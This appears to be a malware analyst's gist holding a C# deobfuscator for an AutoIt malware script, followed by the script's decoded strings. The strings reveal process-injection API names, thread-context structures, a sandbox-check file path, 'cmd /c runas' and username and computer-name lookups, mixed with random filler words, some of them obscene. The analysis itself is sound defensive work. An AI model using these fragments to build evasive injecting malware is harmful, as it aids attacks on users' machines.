@dr4k0nia
Created January 15, 2023 20:21
Quick and dirty deobfuscator for an AutoIt script that is part of a malware sample, SHA256: db8eb8347ed084c3ee3707ad032743e350157abcaf2817e5f15777b20c554b7f
// Deobfuscator for a3x file of sample SHA256: db8eb8347ed084c3ee3707ad032743e350157abcaf2817e5f15777b20c554b7f
using System.Text;
using System.Text.RegularExpressions;
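internal class Program
{
    /// <summary>
    /// Matches one obfuscated call of the form DoctrineDrama("ENCODED", KEY).
    /// Group 1 is the encoded text, group 2 the decimal key.
    /// </summary>
    private static readonly Regex ObfuscatedCall =
        new Regex(@"DoctrineDrama\(""(\w+)"",\s*(\d+)\)");

    /// <summary>
    /// Reads <c>script.a3x</c> from the working directory, replaces every
    /// DoctrineDrama(...) call with its decoded text, and writes the result to
    /// <c>deobfuscated.a3x</c> plus one decoded string per line to <c>strings.txt</c>.
    /// </summary>
    /// <remarks>
    /// Everything read and written here is derived from a malware sample:
    /// both output files hold attacker-controlled text and should be handled
    /// as untrusted data inside the analysis environment.
    /// </remarks>
    private static void Main(string[] args)
    {
        var strings = new StringBuilder();
        string input = File.ReadAllText("script.a3x");

        // Offset the next search starts from. It only moves past a call when
        // that call could not be decoded, so the loop cannot spin on it.
        int searchFrom = 0;
        Match match;
        while ((match = ObfuscatedCall.Match(input, searchFrom)).Success)
        {
            string result;
            try
            {
                // \d+ and \w+ accept more than a valid int / digit run, so
                // parsing can fail on a malformed or deliberately broken call.
                int key = int.Parse(
                    match.Groups[2].Value,
                    System.Globalization.CultureInfo.InvariantCulture);
                result = Decrypt(match.Groups[1].Value, key);
            }
            catch (Exception ex) when (ex is FormatException || ex is OverflowException)
            {
                // Leave the call in place and keep going, so one bad call
                // does not abort the run before any output is written.
                Console.WriteLine($"Skipped undecodable call at offset {match.Index}: {ex.GetType().Name}");
                searchFrom = match.Index + match.Length;
                continue;
            }

            // Replace substitutes every identical call at once, so each
            // distinct call is decoded and logged a single time.
            input = input.Replace(match.Value, result);

            // Resume at the replaced position so the decoded text itself is
            // still scanned, as it was when every pass restarted from 0.
            searchFrom = match.Index;

            // The decoded text is attacker-controlled: escape control
            // characters before they reach the terminal. The files below
            // keep the raw text.
            Console.WriteLine($"Decrypted string: {ToPrintable(result)}");
            strings.AppendLine(result);
        }

        File.WriteAllText("deobfuscated.a3x", input);
        File.WriteAllText("strings.txt", strings.ToString());
        Console.WriteLine("\nDone");
    }

    /// <summary>
    /// Decodes one obfuscated string: <paramref name="input"/> is a list of
    /// decimal numbers separated by the letter 'h'; each number minus
    /// <paramref name="key"/> is one UTF-16 code unit of the result.
    /// </summary>
    /// <param name="input">Encoded text, for example "105h106".</param>
    /// <param name="key">Value subtracted from every number.</param>
    /// <returns>The decoded string.</returns>
    /// <exception cref="FormatException">
    /// A token is empty or not a number, or a decoded value does not fit in a
    /// <see cref="char"/> (previously such values wrapped around silently).
    /// </exception>
    /// <exception cref="OverflowException">A token does not fit in an int.</exception>
    /// <remarks>Internal rather than private so it can be exercised directly by a test.</remarks>
    internal static string Decrypt(string input, int key)
    {
        string[] tokens = input.Split('h');
        var builder = new StringBuilder(tokens.Length);

        foreach (string token in tokens)
        {
            int code = int.Parse(token, System.Globalization.CultureInfo.InvariantCulture);

            // Widen before subtracting so an extreme key cannot overflow int.
            long decoded = (long)code - key;
            if (decoded < char.MinValue || decoded > char.MaxValue)
            {
                throw new FormatException($"Decoded value {decoded} is outside the range of a char.");
            }

            builder.Append((char)decoded);
        }

        return builder.ToString();
    }

    /// <summary>
    /// Returns <paramref name="text"/> with every control character written
    /// as a \uXXXX escape, for safe display on a console.
    /// </summary>
    private static string ToPrintable(string text)
    {
        var printable = new StringBuilder(text.Length);

        foreach (char c in text)
        {
            if (char.IsControl(c))
            {
                printable.Append("\\u").Append(((int)c).ToString("X4"));
            }
            else
            {
                printable.Append(c);
            }
        }

        return printable.ToString();
    }
}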
Fu#Underground#Studio#Resident#
shlwapi.dll
bool
PathIsDirectoryW
wstr
EcGUKitAuT
TrayIconHide
BftkcbgrCIAFqCWNoE
Consists@Registry@Man@Doctrine@Drainage@
respective@Box@Gary@Herbs@Spot@
lTwG
tFtaPoxkbL
kernel32.dll
dword
GetActiveProcessorCount
Interpretation#Family#Democracy#
Sqrt(42895)
OVERNIGHT POSTAL
DriveGetSerial('ubOOvHmgogx')
DANRnFhBBIbcql
abLwPZsuzlbfp
STREAMS-DISCIPLINE-
znKLjtwCYX
cameras*actual*examines*pdt*
signs#Glenn#
sbRAgQBbTlNcEZhnJcDtdxAGoQvj
^.*\\
StringIsFloat('ZHWWlsbzf')
XjfkZUSYBRMLNgZWgHO
WinGetPos('phillips/sleeps/intense/')
posrWHpPCP
long
GetErrorMode
StringIsFloat('iiTvGjAQWUfhti')
Punishment!Churches!
cwBTtoDw
oXdmatZerCmxTsrYwr
lmodwnP
cmd
/c
runas
CloseHandle
ptr
161
DriveGetSerial('kABZzK')
circles^represent^alternatively^guitars^
fTsulpZLaME
WLOVAwvXX
HWnd('Guam^Reynolds^')
adjust/Considerations/Spencer/Maui/
DllStructGetData($citysearchNsFinalsChesterLetters, $michiganforcegateshuttle, $lewisDetectionAssignmentsJoinsFrequent)
DllStructGetData($citysearchNsFinalsChesterLetters, $michiganforcegateshuttle)
StringIsFloat('PcFztRoBJm')
zDsZWljpo
VKWuKoVvTMe
pxMlotTa
jVtHfldlG
znPmqzUesVoPK
OSuWMALGD
Test=Helped=
xZwuwuB
WinGetPos('ACID-FUTURE-')
StringIsFloat('VHtbhTEdaUI')
Sqrt(1809)
Sqrt(57346)
li#chargers#
BFbToeRdoglEIivbz
banned#Roulette#Passing#
HWnd('survival-cordless-grid-float-put-')
dword VirtualAddress; dword SizeOfBlock
XYTNWXAFgKMczIy
hjrZqqoDKX
JOTdKQdDFBybxL
VirtualAddress
Fortune=Winning=
FUNERAL GUARANTEED
lIamQxxwZYqaikipMo
UzWESrWBTul
SizeOfBlock
97
kept*Suspect*
bKZ
HWnd('Banks-Amongst-Cedar-Johnson-Thanks-')
word[
101
Federal^Michelle^
projectors*Show*Mechanism*
ran^prefix^
HmLB
joyuQBzQ
lcsNWoBX
rPfBHSTJoSnOIkj
ZsoDSXCWHt
GoJWvhcPCerxNoZArne
adUBzNlS
13
zojxeXQHBgcWoKOcBDyqytZ
ZINfmUPZPi
HWnd('Authority/Expand/Criterion/')
Directors Priest
HWnd('Slowly#Indirect#Tourism#Founder#')
nZUzwyvHNVowiVQX
XegFuQqkMWtTh
EInZNgg
xnxx Mariah Hood Backed Third
posFOHbWrUMtTRgWox
hRlRfj
DriveGetSerial('HrPaOZqLW')
btFh
WinGetPos('Diversity Lightning Refers ')
145
dutch=Sie=
CSHfCvzl
EhNqazsqdI
SyyCZuLuXKl
WinGetPos('TIPS*CONTINENT*')
HWnd('ntsc#trades#sacrifice#')
QXUdCnVDBrTmauzHzVaqDrWOT
StringIsFloat('wLvgPuOUJt')
bxiLff
ZlWAhlKLNxOAjOn
YtHlpv
tVJTDGGvIukjKgDnl
nLVhBjeJdx
exposure^Fog^Mixed^Focus^
OJEHLmPWAFVDLLYO
HhVYXI
Sqrt(8541)
Inner+Viewing+
controller/Columbus/Atlas/Noble/
HWnd('florence aug ')
DriveGetSerial('UKusr')
StringIsFloat('GFtBxcsuphxaa')
Camcorders Bag Mustang
NEWCASTLE/DEALERS/BERMUDA/BUGS/NEWSPAPERS/
LITERACY+HERE+DYNAMICS+
nsXxAiXx
IGNORE DOWNLOADS ITALIC
Rebel@Blast@
fxTkshuN
vegetables/unto/war/jackets/selective/
25
141
StringIsFloat('lHwsMMBi')
presented Indonesia Sexo Sheer
Sqrt(44582)
stuff*Print*Toolbar*
WinGetPos('Bradford*Immediately*Commented*')
Enable*Kitchen*Bike*
island+Agriculture+Funds+Notified+Default+
DriveGetSerial('GamKbiD')
eKbTVHLq
RYQknUUNiHfJY
nQFIQRllMGIbN
PyZ
VirtualAllocExNuma
handle
dword_ptr
138
MQCRkHY
41
shade=Bulletin=Terror=Concerning=Raised=
AdUhGlsI
LDeBOdhHD
QchJib
vid Moms Integrating
gardening-expressions-taught-
Sqrt(6125)
TA@HAT@RANKS@BRUNSWICK@RELATIVE@
Undertaken-Mariah-Roses-Diamond-Greek-
Sqrt(62592)
aBzDmAX
XPKgbwa
Contracting^Apache^Unavailable^Joseph^
GLOubJqDdIHLBeMTcC
XKufNnFLvP
132
HWnd('Cordless!Sole!Chapter!Lending!')
Succeed Reader Talking
CRYSTAL TRACKED CSS MIGRATION
DriveGetSerial('qQgkCoVkaWq')
cnetcom Sunrise Pierce Proc
Sqrt(39133)
Throwing Proudly Geology Vocals
DriveGetSerial('udRcksbC')
yJICNdkVPsKWwFtiMmjjZVnm
bwjHkyAizyiXBlAGOlkojlJcEb
Reporter Badge Je Participants Transferred
JZHpfHcmRprqo
fWTWia
WinGetPos('joseph*Mae*Msg*')
funky=lifestyle=psychology=
DriveGetSerial('hYcYvNftYTEJqdGao')
Ld@Reduces@Golden@Reg@Openings@
EnvGet('COMPUTERNAME')
tz
WinClose(AutoItWinGetTitle())
Actual/Dept/Communicate/Retention/
yLWMcNTH
pZlcUWKnDJxJVu
jElnfSO
YAg
commissions@Measures@
DriveGetSerial('bvCiahPj')
DriveGetSerial('kEhEQnB')
Sqrt(27756)
czqIKKTAcC
DriveGetSerial('hcMGSxzL')
KwmpppMG
TvAAGpZUTgCAj
aHffpY
RIGbNTHxNPJQs
190
choir/garmin/dicke/
Mother-Surround-Ave-
eOJLBpNsEqbIRphNsiHLvG
CIVILIAN^SECOND^CAUGHT^FACES^
LakFhOgGm
GqsSUxcI
Veterinary^Thats^Laptop^Pt^
70
WinGetPos('PRICED#SOIL#HOTTEST#JOSHUA#')
Parties@Calvin@
Sqrt(27969)
rrSGWm
twCtFZob
thEGvzkghzyrqw
AZDPkgNMOr
bkacbgFs
tape@Beat@
WinGetPos('possess impact ')
UeUIPvUg
XeboPhyMlbGnjg
BILLY=ACTIVISTS=
jordan Waiver Revised Ll Warner
HWnd('jQanhYoyqfuwnBT')
Webmaster=Division=Comic=
Sqrt(56938)
HWnd('gregory*angola*reply*nested*pt*')
WinGetPos('scientist-relaxation-spain-')
favors*password*
GOVERNING#THREADED#COURAGE#
METALS DIES LOADING
HWnd('ARIZONA APPRECIATED ASSIGNED AAA HOUSEWARES ')
xsE
StringIsFloat('XZHkhtIZfYi')
79
111
WinGetPos('Practical*Far*Diving*')
lScKbjVnlu
joUfwTLJRRQxR
iwVRAuIqVwVbz
NEWSLETTERS-JAR-
REGISTRAR^ASSESSMENT^AE^
DriveGetSerial('sZhYfPBABolOlvp')
SKumSRTrYaxCLUPB
dBoUFMu
RRvCSQfaXLetDEg
zxkpKDO
Sqrt(53450)
IpOWYGNrAWxzYX
mandate ten dive dish
strike=Cameron=Detailed=
Alert-Visible-Perry-Mysql-Day-
require+europe+
hQAlRNMT
LKuniCEsefmT
YhWzaqyzGsOL
Sqrt(24415)
Sqrt(43429)
WinGetPos('PNoizmuaEzDUN')
past*allows*joining*
DriveGetSerial('NLurhyZmMALsrcZyO')
Sqrt(63118)
OBJECT!SOMEONE!ASTRONOMY!
StringIsFloat('mvPFFNvm')
150
Justin+Matters+
WinGetPos('dmlqlNnFGFseA')
Goes@Telling@Handle@Merge@
WinGetPos('radiation!Singapore!Stages!Earthquake!Let!')
zoloft/purchase/governance/effect/delay/
Engage^Arkansas^Entertainment^
nxxUjyEp
agazGrt
RKBDjdZ
PtCNOI
fFRWbLIGoZYkeG
XWSlhLmlhIlp
ima
COMPONENTS ENGINEER
wm conditions sluts thanksgiving sat
jxfaqqci
WinGetPos('demands+backed+theaters+downloadable+')
WinGetPos('win Heated ')
zfITkXxov
WinGetPos('populations!Quest!Mathematical!')
NZGTpIjqeJvlanWIhDEpyqnTRbFrO
C:\aaa_TouchMeNot_.txt
DriveGetSerial('fCamndgIDsBIzedPF')
lJjESX
ETZnqewhzIVxLD
FfcJOL
HWnd('HIKING+SUSPENDED+UNDERSTANDING+VAGINA+')
NfZtFbPfH
ELICZ
Waves#Strength#Barn#
MAKERS=GMC=RANKINGS=
Una Scenarios Header Pediatric
EnvGet('USERNAME')
scanner
ORDER=TIM=STAY=
StringIsFloat('rXbRgonUXCvgt')
cold present secure
meat+pending+lithuania+teacher+landscape+
ob^sarah^though^colleges^residential^
copper-adjustable-whereas-cams-panasonic-
discussedHealthCoveredOutreach
krDzudj
ZvHJpACuoAErXdHN
fteExzSDptiY
Floral/Hawaiian/Kenneth/Ingredients/
generators/Port/Joe/Dial/Extent/
wan@Fix@Person@
uBlMoHqlZqOjiCVCsnbKRYxDplWG
ACTION!HOME!
DriveGetSerial('YLOtmbVpMxJmBiGW')
Sqrt(22784)
JnHyvdOpIzMoVzixe
Perfume!Cheapest!Appliance!
gun^Completion^
WinGetPos('gui Rides Exists ')
HWnd('MIME!ENTER!')
created-behalf-plc-presenting-
191
Sqrt(40539)
WinGetPos('sculpture+Undertaken+')
pleased/Reservations/
DriveGetSerial('dCbhNsEBdOmneNd')
GKieqQveJUYta
tuning@univ@lauderdale@
yard@hosting@
StringIsFloat('jqGzYOzoldq')
DriveGetSerial('tOCgHyoSLiUb')
StringIsFloat('PaGITgnXGUw')
aSCPjeRjbuJqoiBX
RHcmLEO
StringIsFloat('mewrKVFiUbjpb')
HWnd('UNITY=BUSINESSES=FLAGS=OLD=TH=')
117
HWnd('STORIES^DOMAINS^')
186
83
HWnd('copper=Mature=Threatening=Know=German=')
wnQFbjqoPoUjQyLenC
Arrange Resolution
PQAEpByBEjXJsb
75
BOLT-HEARTS-DIMENSIONAL-RELIABILITY-
texts/Finances/Produce/
StringIsFloat('JRXshPPiop')
HWnd('aADiXgAzxvzwmZrb')
gMKRsQwaKR
bind=Networks=
individually#arise#denver#generating#harper#
HWnd('retrieval*scripts*only*sodium*')
WinGetPos('dl-creature-noon-christian-')
JaObwU
Sqrt(64690)
HWnd('bpGSkugxlUrJRyj')
HWnd('Performing#Buffer#Translate#')
tours section story
Detection-Deemed-Automated-Dance-
StringIsFloat('dnyrTPgT')
diego/quilt/
EpyTTvOfg
JtOhPbou
esyBTEza
advisors@bobby@objective@paintball@
HWnd('BB*GA*')
WinGetPos('interactive+parliamentary+bath+living+glen+')
DrcAFAUzzwLqniquDzS
lZHdyJBb
situation^philosophy^lands^clothes^goods^
Sqrt(49108)
HWnd('uc Untitled Screen Comply ')
ROBUST+SWISS+GAIN+WARNED+NP+
RACIAL#CAMP#
uPyophuxm
mDjhiB
somewhat!Affect!Editions!
StringIsFloat('FkKfRwGzCt')
182
StringIsFloat('QueNpKYCYSB')
DsBewdhWncXrcOSk
DriveGetSerial('bgorgkYU')
WinGetPos('REGARDLESS#LEGAL#CHRISTIANITY#APPLIES#')
ti!clinic!
95
DENIAL/ACHIEVEMENTS/OMAHA/DEMOCRATIC/INTERACT/
HWnd('PACKETS ACER VERIZON ')
JiOltLprRMbBfAfe
WeBmtgvY
explicitly=second=farm=responded=
CvuPmP
ehYOuoEjndSRsckiT
owaGdJf
ShHTIXSAzDNJZFBy
Provinces+Ourselves+Seeking+Advisor+
HWnd('PRESCRIPTION!OOO!BABIES!HARASSMENT!CAM!')
StringIsFloat('AqawLHty')
WinGetPos('OWEN+MYANMAR+COMPARABLE+GLORY+')
yNAjYGOJbXGQncsUexIbKvHAHlNHW
kw@mortgage@specialty@trinity@
MPIudUD
rVmzmyHspNd
DriveGetSerial('OSdeKteIdxeH')
hOklpGWSO
sJcoISXC
TqBNDvO
uTnuZv
oRGjCtdaO
UnpBCneuSxRTWgB
settle@contracting@lazy@notebooks@commander@
Sqrt(48867)
YNqiYJdczKriaZJJMZiJP
chick/Sims/
debut-Mud-
Sacramento!Govt!Opened!Attempting!
HWnd('Inserted!Astronomy!Ot!Momentum!Tail!')
WinGetPos('yslHTajiuUHOElKg')
HWnd('screens/Artwork/Gasoline/')
114
WmDsCem
lLtdCYg
TivwRGgZlvFpOnMCNas
TChSWTAuIE
SYqYUFby
WinGetPos('We/Cause/Schools/Assumption/')
PERCEIVED-LADIES-BOUND-CHANGELOG-
uint
SetErrorMode
DriveGetSerial('RGgrr')
nmuqIHcTx
rugs rational facilitate airfare
YfjkShboiCrkjN
moderate!City!Alike!
DriveGetSerial('ZfUBULJqVMmJuqS')
48
WinTitleMatchMode
DriveGetSerial('eHKjrjprnIP')
dyycBqkor
tvLAsmtsSwXwGb
ANMIqBwKcRc
uint Size;hwnd hOwner;ptr hInstance;ptr Text;ptr Caption;dword Style;ptr Icon;dword_ptr ContextHelpId;ptr MsgBoxCallback;dword LanguageId
daTypjSvB
karl+whore+joan+richard+
WinGetPos('poverty#inherited#appeal#together#contamination#')
wchar[
HadJhoMziA
Sqrt(55928)
Analog/Classification/Treasurer/Elite/
Directed=Thought=Ways=Clinton=
NURSERY@LETS@JM@QUOTE@LIKED@
WinGetPos('that-Jordan-Want-Oriented-')
#
fjFI
WinGetPos('DECLARE/DOWNLOADED/')
WinGetPos('edinburgh@Surrey@Match@')
Sqrt(26048)
iZGLlr
cXrVTuV
VURnGVluFjjah
RPG+ASPECT+
Glasgow-Convergence-Staying-
DriveGetSerial('NqsqqMEwEynIgCyK')
HWnd('hosted-tend-clean-')
GetModuleHandleW
Sqrt(45037)
Flu-Bend-Colonial-Washer-
uLOgcU
qualifications Motels Mba
Sqrt(25054)
HWnd('cook#mug#telescope#building#')
managers=Learning=Submit=Naked=Happened=
HWnd('BIKINI!ORGANIZATION!')
exempt=thumbzilla=assembled=missing=
StringIsFloat('eKuRTDkBdKXX')
StringIsFloat('dtSeuxdnCzXYiW')
NpUeNdZZF
CEKZxpfVPbMRGjnTajt
otkLfZlOOYHvR
BZZXmJ
vvnYBsLPMLshKdVsqZ
WEHksspLgGEsqh
COMMITTED WINNING SMELL
ZkNBn
YOURS+TERRORISTS+RACK+
colony Temporarily Pulling
DriveGetSerial('ucglcHgrL')
bufing+southern+sperm+elimination+
HPdMUcMspUZeIuBLVwC
zdyFS
Size
dNGvnMGPPm
QxuCDp
PROSPECT@NORMAL@SKILLS@
BDdzIKwOdYO
lTSlQP
HWnd('Chicken/Scsi/Chevrolet/Involved/')
hOwner
FwfBSAZKB
PxQtJA
vKRYbtNGzC
Monster-Qld-
Sqrt(13588)
korea@Surrounded@
hInstance
Muj
ray*minor*shoppercom*
thread!Wish!Cock!Pi!Spoken!
EDT*BESIDES*CONFERENCES*
KJrMaL
UbBwqTbstDcF
bLohQNpelJ
VlyssUp
ESvRDodx
DriveGetSerial('MJlMVIELLtLs')
157
Tribute=Participating=Drove=
Text
fees*key*affiliates*
eg+Advise+Trial+
PwvOpcok
fgZdXVWGmoBI
ZjhyGeOeDGTc
sIIscJqZ
beverages*symptoms*graduates*scholar*
Caption
Hazard/Allows/Atom/
56
Style
updates#mv#div#taylor#engagement#
HWnd('ACUTE-BRIEFLY-WIN-BELONGS-PTS-')
service!staff!
Sqrt(2943)
phrases+fundamentals+
omqfpMOcvh
yJohvm
Houses/Strike/Contributed/Larger/Fantastic/
Icon
YsuteP
SO^CHEMICAL^PUB^MUSTANG^
WinGetPos('fair+quizzes+')
ContextHelpId
Trading@Mic@
Debut=Vic=
159
MsgBoxCallback
LanguageId
xOpYMGtIElR
located Worth Discusses Tiffany Filtering
PNxMkPqdpt
Sqrt(21623)
user32.dll
generations*investors*platform*feeds*
fYeEugKo
AbWTRPDNuwSuu
CZpmuIlSwis
WinGetPos('NN!ACCEPTANCE!CENTURIES!MORTALITY!WIT!')
Young=Eat=
rat=silicon=ot=
GetProcAddress
str
MessageBoxIndirectW
Dale-Decimal-Clark-Units-
CANCER#COMPAQ#
Craig-Shipped-Naked-
MANUFACTURER#IMPOSE#CP#DIAL#WIKIPEDIA#
COMPLEXITY^GUARDIAN^PATROL^INAPPROPRIATE^
CreateThread
dword*
puts^Screw^Restructuring^Domain^
Sqrt(64538)
EqoKRfRetekUmlJlLpCGbfqTn
laura Robinson Sink
HMuTwyvpD
StringIsFloat('TxvyEHjpsCvwz')
thoughts fitness making silicon cholesterol
annotated@uc@bin@evolution@
driven stylus neural accessory
FOCUSES+USD+STEPS+GALLERIES+
Symphony@Sellers@Machine@
2
WinGetPos('Nickname/Implementation/')
StringIsFloat('uCjGYYZeJS')
fighters expand debate hyundai
CdNhAY
McnMVHgGK
yDphdXD
StringIsFloat('IHrAsZOtbD')
FyW
language-vista-planners-report-performed-
Sqrt(53057)
lenderBloggingPleased
none
HWnd('INCEST=BROADCAST=MOTHERBOARD=ABANDONED=')
gOlLxX
MEIQnbYPzvF
DriveGetSerial('AEtwQBmZs')
uint_ptr
SetTimer
hwnd
qFeylx
HWnd('Shore-Stat-Saver-Trackback-Lie-')
transexuales Treatments Iii
Dis!Launched!Vietnamese!Information!Chuck!
uuLUqKSIcepFxEQIrAiUs
StringIsFloat('bLZRuZNNDL')
LrToIhwldFP
OCOqEVcxXR
EVbXheRXnW
StringIsFloat('iafgQBeUr')
DriveGetSerial('IuABZhDALWyIr')
HWnd('TRIPLE ERIC ')
WinGetPos('advisor/Amend/')
Citations!Caps!Explanation!Illinois!
voices!bars!bags!seal!book!
GINKJocTmpEgfDLbu
qCKFQEH
RaaOivAJlWoRUjw
TbUuYoxiKWi
kyle!Networks!Formula!Profiles!War!
ONKldTAXboW
Sqrt(37147)
WinGetPos('sn Exceed ')
consistency@Live@Kennedy@Shortcuts@Source@
vIZOXdz
DriveGetSerial('KQwCZenkXClBRECwZ')
StringIsFloat('icFzHuBqIxFUvD')
IX=CONTAINING=FOUNDATION=BUBBLE=
DriveGetSerial('NLetSHsihDnkvT')
Sqrt(44700)
kRoOYlNAmeljjdz
DriveGetSerial('HlRKtX')
XBdMSk
stored@Tue@Neighbors@Humanity@Biggest@
HWnd('missions#Reported#Train#Pct#')
123
LNTfxpY
Mba
bra+Vulnerability+Spoken+Sing+
voKOOOHVWkcTKvRlqKg
aIPthaQx
Memorial^Belt^
JlcVWixiL
HWnd('Church Innocent Booth ')
WinGetPos('HB@DRAMATIC@COMPUTATIONAL@PRESIDENTIAL@ACCURATELY@')
StringIsFloat('KSQGIvAv')
StringIsFloat('wjRmgGTm')
XyWTbHZZA
efBVPdJPO
StringIsFloat('nvSGvXUF')
Sqrt(30519)
HWnd('sprint-Periods-Assistant-Fat-')
Sqrt(33815)
PLAYSTATION^PUBLIC^CAPS^JOHNNY^HACKER^
HWnd('FiRWAVrmRFKPdW')
eyed*judy*toshiba*
RaxFWoWYWOMfiAR
fISNx
fcFIgNYG
eUUCoHwtdVzYp
eUASPCiQnASN
StringIsFloat('MKqAmAzPl')
sk project black screw
QHXIgFRYYo
appliance Answers Longest Check Labor
gZlrTlnaMnpjekxTj
Previews#Typically#Tasks#
mvrQWqzhF
CsRJdAogzUGldRLnWwe
rQCRZelgTkpVVB
StringIsFloat('kZxtbmgMUXwhW')
StringIsFloat('fPTKaRwyXnZlSu')
ECuyDItbxldAxo
128
HWnd('WARM!TRACKER!CONSUMER!RESULTED!')
WinGetPos('MANHATTAN/TENNESSEE/EUGENE/THRU/WEB/')
HWnd('FqUVdmDLlkEqeV')
hQMyoKINy
BfQicDSjELOBkJ
VOESTAsCwlIwsaYKMViOXYjyG
176
mjzlbHq
JfRrJUFJS
ifBRSRugUa
rGquQGJN
JnctxYmQGVzwucW
rWfRz
Supposed=Expectations=Xml=Company=
Sqrt(51509)
ovQQ
tvwOYFkWuwZCpZEjoPH
MprfM
DI PARISH ROMANIA
nQGXbdUstgLeR
woRBiKlw
IMFLQv
careers^certificates^bills^watershed^medline^
strand/Snapshot/Languages/
TQcJh
JANUARY/WEBLOGS/CT/
6
SzcehAXz
DNqEXrGyeFPxYYfv
NSnLzEvHZImmA
Interstate!Scanners!Children!Poland!Fork!
znBaqaC
AYDSXXC
DPOnhwvcx
tumor^Research^
DriveGetSerial('tPGfpNfscD')
StringIsFloat('TzDEHzFUuiU')
cover/Shopping/Boards/Authorization/
Ctb
connections!Clicks!Iowa!
StringIsFloat('xgkrOIwxqyw')
DriveGetSerial('nfObbFtixUmJjea')
KVlwx
hardcore buy grounds conflicts
HWnd('THOROUGHLY!DEPARTMENT!')
dAeCmPClKPKCagM
QTAHr
WinGetPos('hyundai Fred Featuring Probably Diana ')
Fed^Visits^
YYIsTcUbMUb
CORpTmVXd
POLYESTER@BROADER@NETHERLANDS@PROFESSIONAL@
StringIsFloat('EpcCsToApI')
zGbaFg
IdYVzgrocO
XgPcJt
TRAILER!SACRAMENTO!STRONG!GUILTY!
StringIsFloat('pJjseTVgRPgz')
nQlJ
wGgBubMySGRtYhBAU
cgVJvbUvvbaheFzJrsoRhbCzk
MVDemdMtI
Advertisements*Separation*Default*
lofUoY
WfelKnRjTAQ
RbdAFRv
Known!Penn!Linda!Conscious!
StringIsFloat('tbwhxfyHYVmnw')
StringIsFloat('gLFexXYhinhr')
WinGetPos('VOLT@INSPIRATION@')
Hang*Upset*Appraisal*
MHVVUtTrqz
OCAIJaLO
int
KillTimer
sit*licking*truly*necessary*
modification*Notifications*
VE#SPORT#NOISE#CRADLE#JUSTIFY#
prev^griffin^sound^
Therefore^Publications^Hate^Sacred^
WinGetPos('SOLD@ROSTER@POLAR@OM@EVIDENCE@')
WinGetPos('cisco+chelsea+')
DAGxlsmzf
awarded*Absolutely*
excluded!exports!seven!observation!
WinGetPos('perspectives@Vote@')
StringIsFloat('OshSGUDrifLf')
MxaDZwsHy
uUJUEWdHTDDwfoRTFmT
GiDTiINAwNPF
37
participants-Complimentary-P-Tan-Lopez-
REMOVABLE DOMINICAN EXCESSIVE CONSIDER CARRYING
byte[
StringIsFloat('gbTitwUNq')
DriveGetSerial('yKGrmileHCN')
Were=Bookstore=Foods=Observations=
HWnd('Configured!Promotional!Earthquake!Wellington!Flu!')
HWnd('Complaint=Liberia=Developed=')
Appliances!School!Zoo!
opera+violent+looks+
dword cbSize; ptr Reserved; ptr Desktop; ptr Title; dword X; dword Y; dword XSize; dword YSize; dword XCountChars; dword YCountChars;
dword FillAttribute; dword Flags; word ShowWindow; word Reserved2; ptr Reserved2; ptr hStdInput; ptr hStdOutput; ptr hStdError
QasONhQae
wu!Arising!Kept!
ptr Process; ptr Thread; dword ProcessId; dword ThreadId
indicated-Rogers-Relate-Thermal-
StringIsFloat('woaKyEpeQ')
CreateProcessW
DriveGetSerial('WJfGyKxSyhNPeQNN')
HWnd('Southern*Automobiles*Vegetarian*Agent*Spoken*')
StringIsFloat('GpiCBFnpBU')
JURY TRAMADOL OBVIOUSLY FIGURE
StringIsFloat('zzegTwETAtD')
174
diabetes#Customize#Sets#Dispute#
Process
xfjcG
Unto Trigger
HWnd('champagne=Sigma=')
ZAfQRJ
pOkmCjJKtBqEa
TFbAmdAEsu
DriveGetSerial('VLshCkRk')
Thread
ULTRA THEY ACHIEVEMENTS FOUNDER EARNED
DriveGetSerial('WWLusB')
StringIsFloat('KSryaeUEWNQ')
ProcessId
NregRQBRKO
WinGetPos('Bon^Das^')
HWnd('PROPOSE@ADDRESSED@FELL@MUSEUMS@')
HWnd('Wednesday Packets Leather Tribute Jackie ')
kYQaLh
LbsFwcuayVqFkz
BuMpuPS
Rysdba
uSjDEhSIaaAHvtj
FubzJTHrStr
BVYQOPw
TZPcIEWHvWRYFC
uiCltu
Shepherd+Occupations+Piece+Sec+Beast+
Sqrt(51811)
TOVIcF
NBpdXVaawK
LpJOrmtTQoFl
RqwWGEgZ
VWnWYyXjSRiD
OauKVB
HWnd('Plane Removable Dress Leaves Neighbors ')
Sqrt(5322)
HWnd('DOUBLE CHARACTERIZATION ')
DriveGetSerial('nIJhaVJSSoM')
combat!tickets!pt!pediatric!
Welding!Chest!Usd!
X64
align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home; dword ContextFlags; dword MxCsr; word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags; uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7; uint64 Rax; uint64 Rcx; uint64 Rdx;
uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15; uint64 Rip; uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2];
uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2]; uint64 VectorRegister[52]; uint64 VectorControl; uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip
GlBPQeRAbBcnAqWhymgTsC
Charity@Regulation@Focused@Morocco@Benz@
wb-urw-librarian-
COMMISSIONS*FIELDS*
StringIsFloat('PKDFbgvRzzqxb')
DriveGetSerial('fVwnZNl')
dword ContextFlags; dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7; dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector;
byte RegisterArea[80]; dword Cr0NpxState; dword SegGs; dword SegFs; dword SegEs; dword SegDs; dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax; dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs; byte ExtendedRegisters[512]
Sqrt(33618)
Director See Coated
DriveGetSerial('FWrBBoslZSKO')
